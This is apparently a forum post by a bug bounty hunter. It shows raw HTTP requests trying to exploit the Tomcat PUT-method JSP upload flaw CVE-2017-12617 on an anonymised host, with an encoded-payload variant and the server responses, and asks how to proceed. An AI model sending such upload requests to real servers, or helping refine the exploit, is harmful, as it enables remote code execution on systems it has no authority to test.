I am a bug bounty hunter. When doing some research, I found a subdomain that is using Apache Tomcat. Talk about Tomcat, there was a vulnerability found in 2017: CVE-2017-12617.
Any Apache Tomcat server with enabled PUT
request method will allow the attacker to create a JSP file in the server through a crafted request and will lead to RCE:
PUT /1.jsp/ HTTP/1.1 Host: vulnerable.com Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://vulnerable.com/public/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2 Cookie: JSESSIONID=A27674F21B3308B4D893205FD2E2BF94 Connection: close Content-Length: 26 <% out.println("hello");%>
And after some testing, I found that the server enabled the PUT
method. But when I sent the exploit request, there is an error:
PUT /1.jsp/ HTTP/1.1 Host: vulnerable.com Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Sec-Fetch-Dest: document Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,vi;q=0.8 Cookie: ... If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT Content-Type: application/x-www-form-urlencoded Content-Length: 26 <% out.println("hello");%> HTTP/1.1 500 Internal Server Error Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 389 Date: Fri, 17 Apr 2020 02:07:24 GMT Connection: close <html><body><h1>Whitelabel Error Page</h1><p>This application has no explicit mapping for /error, so you are seeing this as a fallback.</p><div id='created'>Fri Apr 17 11:07:24 JST 2020</div><div>There was an unexpected error (type=Internal Server Error, status=500).</div><div>URLDecoder: Illegal hex characters in escape (%) pattern - For input string: " o"</div></body></html>
I found that the error is from the Java URLDecoder. The server may has decoded the content in the body of the request, but the % o
is not a valid URL character, so the error turns out. It proves that the server has handled the request, it may works but not. Then I try this:
PUT /1.jsp/ HTTP/1.1 Host: vulnerable.com Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Sec-Fetch-Dest: document Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,vi;q=0.8 Cookie: ... If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT Content-Type: application/x-www-form-urlencoded Content-Length: 26 <%25 out.println("hello");%25> HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Fri, 17 Apr 2020 02:05:30 GMT Connection: close Content-Length: 1295 <!DOCTYPE html> <!-- ~ Copyright (c) 2018 Vulnerable Corporation. All rights reserved. ~ Vulnerable Corporation PROPRIETARY/CONFIDENTIAL. Use is subject to license terms. --> <html> <head> <title>VULNEARBLE</title> ...
It gave me back a 404 response. I have tried the POST
but it just proves that there is a special thing in the PUT
method:
POST /1.jsp/ HTTP/1.1 Host: vulnerable.com Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Sec-Fetch-Dest: document Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,vi;q=0.8 Cookie: ... If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT Content-Type: application/x-www-form-urlencoded Content-Length: 26 <% out.println("hello");%> HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Fri, 17 Apr 2020 02:05:30 GMT Connection: close Content-Length: 1295 <!DOCTYPE html> <!-- ~ Copyright (c) 2018 Vulnerable Corporation. All rights reserved. ~ Vulnerable Corporation PROPRIETARY/CONFIDENTIAL. Use is subject to license terms. --> <html> <head> <title>VULNEARBLE</title> ...
(The POST
request even does not appear any error or response). I have checked the 1.jsp
file but it hasn’t been created yet:
GET /1.jsp/ HTTP/1.1 Host: vulnerable.com Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Sec-Fetch-Dest: document Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,vi;q=0.8 Cookie: ... If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT Content-Type: application/x-www-form-urlencoded Content-Length: 26 HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Fri, 17 Apr 2020 02:05:30 GMT Connection: close Content-Length: 1295 <!DOCTYPE html> <!-- ~ Copyright (c) 2018 Vulnerable Corporation. All rights reserved. ~ Vulnerable Corporation PROPRIETARY/CONFIDENTIAL. Use is subject to license terms. --> <html> <head> <title>VULNEARBLE</title> ...
Does anyone know what is happens and what should I do next?